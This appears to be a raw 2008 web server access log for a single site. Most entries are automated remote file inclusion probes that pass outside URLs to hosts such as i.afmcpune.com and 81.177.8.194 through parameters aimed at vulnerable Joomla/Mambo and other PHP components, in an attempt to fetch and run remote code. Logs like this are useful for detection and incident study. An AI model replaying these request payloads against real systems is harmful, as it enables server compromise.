210.245.122.3 - - [13/Jul/2008:11:55:35 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:11:55:40 -0700] "GET /logs/access_080301.log/encapscms_PATH/core/core.php?root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:11:55:55 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:55:55 -0700] "GET /logs/access.log//main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:55:55 -0700] "GET //main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:55:56 -0700] "GET /logs//main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:11:56:00 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:11:56:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:11:56:05 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:56:08 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:11:56:20 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:11:56:21 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:11:56:22 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.67.27.164 - - [13/Jul/2008:11:56:30 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.164 - - [13/Jul/2008:11:56:30 -0700] "GET //main.php?sayfa=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.164 - - [13/Jul/2008:11:56:30 -0700] "GET /logs/access.log//main.php?sayfa=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.164 - - [13/Jul/2008:11:56:30 -0700] "GET /logs//main.php?sayfa=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [13/Jul/2008:11:56:41 -0700] "GET /logs/index.php?inc_dir=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [13/Jul/2008:11:56:44 -0700] "GET /index.php?inc_dir=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 200 18395 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:11:56:49 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:57:11 -0700] "GET //index.php?lang=en&cat=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 4911 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:57:11 -0700] "GET /logs//index.php?lang=en&cat=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:57:12 -0700] "GET /logs/errors.php?error=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:57:13 -0700] "GET /errors.php?error=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:11:57:14 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:11:57:14 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:11:57:15 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:11:57:23 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:57:38 -0700] "GET /logs/access.log//main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:57:38 -0700] "GET //main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:57:39 -0700] "GET /logs//main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:57:50 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:58:07 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:11:58:13 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.99.30.15 - - [13/Jul/2008:11:58:45 -0700] "GET /?show=slide&pageid=17 HTTP/1.0" 200 34731 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:11:58:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:11:58:56 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:11:59:05 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:11:59:05 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.98.71 - - [13/Jul/2008:11:59:11 -0700] "GET /logs/index.php?side=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [13/Jul/2008:11:59:17 -0700] "GET /index.php?side=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18393 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:59:59 -0700] "GET /logs/access_080313.log/index.php?pag=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:11:59:59 -0700] "GET /logs//main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.238.20 - - [13/Jul/2008:12:00:00 -0700] "GET //main.php?sayfa=http://canopus.ae//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:12:00:03 -0700] "GET /index.php?pag=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 200 18423 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:12:00:03 -0700] "GET /logs/index.php?pag=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:12:00:18 -0700] "GET /logs/access_071223.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:12:00:18 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:12:00:18 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:00:18 -0700] "GET /logs/forum.php?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:00:19 -0700] "GET /forum.php?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:00:33 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:00:34 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:00:34 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:12:00:36 -0700] "GET /logs//authentication/errors.php?error=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:12:00:37 -0700] "GET //authentication/errors.php?error=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:12:00:39 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:12:00:39 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.20.1.30 - - [13/Jul/2008:12:00:47 -0700] "GET /login.php?svr_rootscript=http://cncteknix.com/portal//components/com_joomlalib/standalone/idfile.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:12:00:50 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:12:01:02 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:12:01:02 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:12:01:06 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:12:01:07 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:12:01:08 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:12:01:19 -0700] "GET /logs/access_080218.log/index.php?pag=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:12:01:25 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:01:30 -0700] "GET /logs/access_080329.log/index.php?sayfa=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:01:35 -0700] "GET /index.php?sayfa=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:01:36 -0700] "GET /logs/index.php?sayfa=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:02:06 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:02:07 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:02:07 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:12:02:19 -0700] "GET /logs/home.php?pagina=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:12:02:19 -0700] "GET /home.php?pagina=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:12:02:29 -0700] "GET /logs/access_080218.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.74.1 - - [13/Jul/2008:12:02:48 -0700] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.117.142.252 - - [13/Jul/2008:12:02:55 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.142.252 - - [13/Jul/2008:12:02:55 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.142.252 - - [13/Jul/2008:12:02:56 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:12:02:59 -0700] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.142.252 - - [13/Jul/2008:12:03:01 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.142.252 - - [13/Jul/2008:12:03:02 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:12:03:02 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.117.142.252 - - [13/Jul/2008:12:03:02 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:12:03:02 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:12:03:06 -0700] "GET /index.php?meio.php=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 200 18435 "-" "libwww-perl/5.803" "www.dmulk.com"
85.131.171.231 - - [13/Jul/2008:12:04:04 -0700] "GET /logs/index.php?side=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.171.231 - - [13/Jul/2008:12:04:08 -0700] "GET /index.php?side=http://?? HTTP/1.1" 200 18333 "-" "libwww-perl/5.805" "www.dmulk.com"
195.85.130.159 - - [13/Jul/2008:12:04:17 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [13/Jul/2008:12:04:17 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:12:04:29 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:12:04:29 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:12:04:35 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:12:04:35 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:04:37 -0700] "GET /logs/access_080313.log/index.php?pag=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:04:40 -0700] "GET /logs/index.php?pag=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:12:04:41 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
68.142.212.191 - - [13/Jul/2008:12:04:41 -0700] "GET /blog/wp-content/uploads/picture-015-800x600.jpg HTTP/1.0" 200 160195 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:04:43 -0700] "GET /index.php?pag=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:12:05:08 -0700] "GET /logs/index.php?side=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.70.18 - - [13/Jul/2008:12:05:13 -0700] "GET /logs/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:12:05:16 -0700] "GET /index.php?side=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18393 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.70.18 - - [13/Jul/2008:12:05:16 -0700] "GET /index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 200 18437 "-" "libwww-perl/5.811" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:05:21 -0700] "GET /logs/access_080218.log/index.php?pag=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.241 - - [13/Jul/2008:12:05:22 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.241 - - [13/Jul/2008:12:05:22 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.241 - - [13/Jul/2008:12:05:23 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.241 - - [13/Jul/2008:12:05:23 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.241 - - [13/Jul/2008:12:05:23 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.241 - - [13/Jul/2008:12:05:24 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:12:05:26 -0700] "GET /logs/access_071225.log/index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:12:05:27 -0700] "GET /logs/index.php?p=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:12:05:29 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
